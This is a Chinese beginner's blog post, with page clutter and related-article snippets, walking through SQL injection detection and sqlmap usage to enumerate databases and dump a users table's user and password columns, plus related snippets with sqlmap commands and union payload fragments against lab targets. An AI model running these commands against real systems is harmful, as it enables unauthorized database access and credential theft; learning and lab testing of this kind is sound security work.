sql注入及其工具sqlmap的使用(小白)

最新推荐文章于 2021-07-07 23:29:02 发布
最新推荐文章于 2021-07-07 23:29:02 发布
阅读量222 收藏
点赞数
分类专栏: web安全 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45761012/article/details/105188305
版权

关于sql注入的问题(小白)
第一是关于工具:sqlmap;
对于一个网站是否存在sql注入漏洞,我们可以通过在参数后面加’ 看是否闭合,从而判断是否存在sql注入。在这里插入图片描述
然后我们就发现报错在这里插入图片描述到这里我们就使用sqlmap来进行扫描。
语法为python sqlmap,py -u ""在这里插入图片描述然后我们就发现acuart存在get方式的注入,数据库为MySQL。在这里插入图片描述然后我们查看用户 在url后面加上–users在这里插入图片描述然后再对数据库进行查看–dbs在这里插入图片描述我们发现了在当前的权限下可以看到两个数据库。
接着我们就查看了acuart中的数据–tables -D "数据库名"在这里插入图片描述接着查看users表中的数据–columns -T “users” -D “acuart”在这里插入图片描述
我们的关注点在password和user,所以我们就要dump下来
-D “acuart” -T “users” -C “user,password” --dump
如果你想下载整个数据库(脱裤),就直接-D `“acuart” --dump-all
就这样,一次get请求的SQL注入就完成了。
如果文章有不善的地方,欢迎大佬斧正。

Avirus.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 3983
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
sql注入 小白入门学习笔记(九)sqlmap使用
mastergu2的博客
07-28 237
首先这里给出一个比较基本的 sqlmap.py -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --batch 说明一下,一般来说“ - ”代表的是目标,“ – ”代表的是操作。 -u:目标url (ps:这里是get请求,所以目标url记得带上后面的参数,即?id=1) –dbs:爆出全部数据库 –batch:全部使用默认选项 然后得到如图 然后我们想要爆出security里面的表 sqlmap.py -u http://192.168.1.103/s
小白sql注入
萍水间人的小天地
03-30 112
判断有无单引号报护 如果有单引号报护, 1' # 注释掉其后的单引号 and 1=1 1' and 1=1 # 依然回显数据 1 and 1=2 解决了我的一个疑惑, 就是如果 是 ’1 and 1=2' 还会不会执行语句, 现在看来是会的 1' order by 10 # 然后就判断数据表只有 4列 1' union se...
使用sqlmap工具进行sql注入
weixin_45790675的博客
10-27 385
例题 首先我们先来查库名 得知有六个库名 [1] error [2] head_error [3] information_schema [4] kanwolongxia [5] post_error [6] widechar 接着我感觉flag在error库里,所以我开始跑error库的表名 跑出两个表名 ±-----------+ | user | | error_flag | ±-----------+ 然后我们要知道表里的字段,我猜flag在表error_flag中 得出表中字
小白SQL注入(一)
x519461623的博客
11-28 284
数据库操作与注入逻辑(不玩数据库很难吃透sql注入) 要学sql注入,就得先了解数据库。 所谓知己知彼,百战不殆 如果你对数据库一窍不通,然后用Sql注入的一般测试方法去测… 对吧,加个’ 然后对面报错了你就高兴的大喊,“啊,这个有注入漏洞”然后就不知道怎么弄了 那么接下来就开始吧!(大佬勿喷) 我们先来看看数据库是个什么东西: (mysql的安装搭建这里就不讲了,百度很多) 也可以用集成坏境...
网络安全 sql注入工具sqlmap使用
01-13
网络安全 sql注入 工具sqlmap使用
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
SQL注入测试工具sqlmap工具
05-14
渗透测试SQL漏洞,sqlmap工具;渗透测试SQL注入测试工具
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
小白初学sql注入
Butterfly_Erhai_Lake的博客
10-26 475
sql-lab lesson1&2&3
小白上手sqlmap笔记
t89lucy的博客
05-20 193
基于Windows使用sqlmap获取封神台第一章:为了女神小芳!的flag 实验注意事项: 1、确保电脑有python环境,将sqlmap下载解压后,复制到Python安装的文件夹中 2、将cmd命令行创建快捷方式到桌面,右击图标的属性,将你刚才复制的sqlmap路径复制到起始位置 点击应用,双击桌面图标,输入sqlmap.py 弹出这个,表示搭建完成 至此环境已经搭建完成 实验开始: 一、先通过传送门进入封神台搭建的靶场。 点击查看新闻,可以看到网页的网址有变化,后面多了/id=1 感觉这里是
小白SQL注入基础入门详细解析
m0_55479420的博客
03-31 259
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费
一些入门的的SQL注入小白基础笔记
unimoon1995的博客
08-30 326
SQL注入: user()返回当前数据库连接使用的用户; database()返回当前数据库连接使用的数据库; version()返回当前数据库的版本; information_schema为mysql中自带的数据库,提供访问数据库元数据的方式。 元数据:关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。 information_schema中,有数个只读表。实际上为视图,不是基本表。...
SQL注入小白入门,大佬请绕道
LISTONE的个人博客
04-15 409
SQL注入小白入门,大佬请绕道 什么是SQL 结构化查询语言(Structured Query Language)简称SQL SQL使我们有能力访问数据库 什么是SQL注入 用户提交的数据可以当作命令被数据库解析执行 漏洞示例代码: <?php echo '<h1>欢迎关注LISTONE公众号</h1>'; $name = $_GET['nam...
sql注入sqlmap
Zf_008的博客
01-21 258
使用sqlmapsqli-less1注入过程
weixin_44352058的博客
05-02 685
使用sqlmap脚本工具sqli-less1题解 1.检测当前注入点,测试表明GET参数ID可能是可注入型的 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 2. 找出所有的数据库名 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --dbs 3.查看数据库中的表 sqlmap.py -...
SQL注入基础步骤及SQLMap工具使用(一)
gaogzhen的博客
06-28 8832
SQL注入基础步骤及SQLMap工具使用(一) 测试环境为VMware WorkStation虚拟机 一、环境搭建 (一)、phpstudy2018集成环境安装使用 安装使用,自行百度,下载地址:官网地址 1.http://phpstudy.php.cn/ (二)、SQL注入源码 百度网盘: 1.链接:https://pan.baidu.com/s/1B0VSwXk6JnZbB...
sqlmap实战注入步骤——超详细
渗透测试
07-07 2476
sqlmap实战注入步骤 测试环境: 系统—>winxp 目标—>sqli—labs IP—>192.168.1.106 输入?id=1,内容出现变化,存在sql注入 打开sqlmap,输入sqlmap.py -u http://192.168.1.106/sqli-labs-master/Less-2/index.php?id=1 --dbs查看所有数据库 找到很多数据库,查找security数据库中的数据表,sqlmap.py -u http://192.168.1.106/
什么是SQL注入漏洞-SQLmap注入
最新发布
05-21
SQL注入漏洞是一种常见的Web应用程序安全...SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值